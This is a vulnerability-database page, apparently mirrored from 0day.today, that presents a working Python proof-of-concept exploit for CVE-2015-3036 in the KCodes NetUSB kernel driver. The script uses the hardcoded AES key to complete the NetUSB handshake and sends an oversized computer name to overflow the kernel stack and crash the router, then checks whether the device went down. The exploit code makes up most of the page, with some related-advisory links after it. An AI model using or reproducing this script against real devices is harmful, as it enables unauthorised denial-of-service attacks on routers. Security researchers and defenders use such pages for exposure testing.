Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
zdtAdrian Ruiz Bermudo1337DAY-ID-24451
HistoryOct 29, 2015 - 12:00 a.m.

NetUSB Kernel Stack Buffer Overflow Exploit

2015-10-2900:00:00
Adrian Ruiz Bermudo
0day.today
37

0.345 Low

EPSS

Percentile

97.1%

JSON

Exploit for windows platform in category dos / poc

#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Exploit Title: NetUSB Kernel Stack Buffer Overflow
# Date: 9/10/15
# Exploit Author: Adrian Ruiz Bermudo
# Vendor Homepage: http://www.kcodes.com/
# Version: Multiple: https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20150519-0_KCodes_NetUSB_Kernel_Stack_Buffer_Overflow_v10.txt
# Tested on: NETGEAR DC112A
# CVE : CVE-2015-3036
 
import socket
import sys
import random
import string
import time
import struct
from Crypto.Cipher import AES #pip install pycrypto
 
DOS_BYTES = 128 #BoF
TIMEOUT = 5
RECV_SIZE = 16
PORT_DEFAULT = 20005
 
AESKey = "\x5c\x13\x0b\x59\xd2\x62\x42\x64\x9e\xd4\x88\x38\x2d\x5e\xae\xcc"
 
print "#"
print "# Exploit KCodes NetUSB | Kernel Stack Buffer Overflow | Denial of Service (DoS)"
print "# CVE-2015-3036"
print "# Found by: Stefan Viehböck (Office Vienna) | SEC Consult Vulnerability Lab | https://www.sec-consult.com"
print "# Exploit author: Adrián Ruiz Bermudo | @funsecurity | http://www.funsecurity.net"
print "# Advisory: https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20150519-0_KCodes_NetUSB_Kernel_Stack_Buffer_Overflow_v10.txt"
print "#"
print ""
 
if len(sys.argv) >= 2:
    try:
        target = sys.argv[1]
        try:
            port = int(sys.argv[2])
        except Exception as detail:
            port = PORT_DEFAULT
         
        #Inicialización de la conexión.
        init = "\x56\x05"
        #Datos aleatorios para el handshake
        randomData = "".join(random.choice(string.lowercase) for i in range(RECV_SIZE))
        #Nombre del equipo con 128 carácteres para provocar DoS.
        computerName = "".join(random.choice(string.lowercase) for i in range(DOS_BYTES))
        #Longitud del nombre del equipo - "\x80\x00\x00\x00"
        lengthComputerName = struct.pack("i", DOS_BYTES);
        #Sync - "\x07\x00\x00\x00"
        syncOK = struct.pack("i", 7);
        #Finalización de la conexión.
        end = "\x01"
 
        encryption_suite = AES.new(AESKey, AES.MODE_ECB, "")
        randomDataCrypt1 = encryption_suite.encrypt(randomData)
 
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.settimeout(TIMEOUT)
 
        print "Conectando:", target,":",port
        sock.connect((target, port))
        print "Conectado"
        print "----------------"
 
        print "Inicializando:", init.encode("hex")
        sock.send(init)
        print "Random data para cifrar por el servidor:", randomData.encode("hex")
        sock.send(randomData)
        print "----------------"
 
        result = sock.recv(RECV_SIZE)
        print "Random data cifrados por el servidor:", result.encode("hex")
        print "Random data cifrados por el cliente:", randomDataCrypt1.encode("hex")
        if (randomDataCrypt1 == result):
            print "Handshake OK"
            randomData = sock.recv(RECV_SIZE)
            print "Random data a cifrar por el cliente:", randomData.encode("hex")
            randomDataCrypt2 = encryption_suite.encrypt(randomData)
            print "Random data cifrados por el cliente:", randomDataCrypt2.encode("hex")
            print "----------------"
            sock.send(randomDataCrypt2)
            print "Tamanio del nombre del host a parear:", lengthComputerName.encode("hex")
            sock.send(lengthComputerName)
            print "Nombre del host a parear:", computerName.encode("hex")
            sock.send(computerName)
            print "----------------"
 
            print "Sync: ", syncOK.encode("hex")
            sock.send(syncOK)
            if (sock.recv(RECV_SIZE) == syncOK):
                print "Sync ok"
                sock.send(end)
                try:
                    #Esperamos unos segundos antes de conectar
                    time.sleep(TIMEOUT)
                    #Comprobamos si el dispositivo sigue vivo...
                    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                    sock.settimeout(TIMEOUT)
                    sock.connect((target, port))
                    print "No vulnerable"
                except Exception as detail:
                    print "Vulnerable, exploit OK"
            else:
                print 'Sync error.'
    except Exception as detail:
        print "Error de comunicación:", detail
else:
    print "Usage:", sys.argv[0], "target [port]"

#  0day.today [2018-03-14]  #

Related

cvelist 1
zdt 1
nvd 1
threatpost 1
cert 1
exploitpack 2
prion 1
cve 1
packetstorm 1
thn 2
exploitdb 2
cvelist
cvelist
CVE-2015-3036
2015-05-21 01:00:00
zdt
zdt
Linux/MIPS Kernel NetUSB - Remote Code Execution Exploit
2015-10-14 00:00:00
nvd
nvd
CVE-2015-3036
2015-05-21 01:59:27
threatpost
threatpost
KCodes NetUSB Vulnerability Details Surface
2015-05-19 14:41:57
cert
cert
KCodes NetUSB kernel driver is vulnerable to buffer overflow
2015-05-19 00:00:00
exploitpack
exploitpack
NetUSB - Kernel Stack Buffer Overflow
2015-10-29 00:00:00
LinuxMIPS Kernel 2.6.36 - NetUSB Remote Code Execution
2015-10-14 00:00:00
prion
prion
Stack overflow
2015-05-21 01:59:00
cve
cve
CVE-2015-3036
2015-05-21 01:59:27
packetstorm
packetstorm
NetUSB Stack Buffer Overflow
2015-10-10 00:00:00
thn
thn
NetUSB Driver Flaw Exposes Millions of Routers to Hacking
2015-05-19 21:01:00
New KCodes NetUSB Bug Affect Millions of Routers from Different Vendors
2022-01-11 11:59:00
exploitdb
exploitdb
NetUSB - Kernel Stack Buffer Overflow
2015-10-29 00:00:00
Linux/MIPS Kernel 2.6.36 - 'NetUSB' Remote Code Execution
2015-10-14 00:00:00

0.345 Low

EPSS

Percentile

97.1%

JSON
Related for 1337DAY-ID-24451
cvelist1zdt1nvd1threatpost1cert1exploitpack2prion1cve1packetstorm1thn2exploitdb2